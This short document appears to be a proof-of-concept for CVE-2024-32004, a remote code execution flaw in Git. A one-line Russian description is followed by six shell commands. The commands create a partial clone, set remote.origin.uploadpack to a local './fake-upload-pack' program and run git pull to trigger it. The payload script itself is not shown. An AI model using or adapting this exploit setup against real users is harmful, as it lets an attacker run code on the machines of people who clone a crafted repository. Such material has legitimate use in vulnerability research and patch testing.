
Эксплойт Proof-of-concept для CVE-2024-32004, уязвимости удаленного выполнения кода в Git, демонстрирующий эксплуатацию через вредоносный фильтр upload-pack.
git init tmp
git -C tmp config uploadpack.allowfilter 1
git clone --filter=blob:none --no-local --no-checkout tmp evil
rm -rf tmp
git -C evil config remote.origin.uploadpack "./fake-upload-pack"
git pull